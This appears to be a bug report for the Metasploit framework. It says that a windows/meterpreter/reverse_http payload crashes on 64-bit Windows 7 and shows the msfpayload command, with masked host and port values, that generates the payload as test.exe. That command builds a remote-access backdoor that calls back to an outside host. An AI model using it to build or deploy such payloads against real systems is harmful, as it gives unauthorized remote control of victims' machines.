Bug Report: reverse_http payload fails to run correctly on Windows 7 64 bit

Using:
msfpayload windows/meterpreter/reverse_http PXHOST=XXX.XXX.XXx.XXX
PXPORT=XXX PXURI=/loader X > test.exe

Executing test.exe results in a "Windows Error Report" dialog.
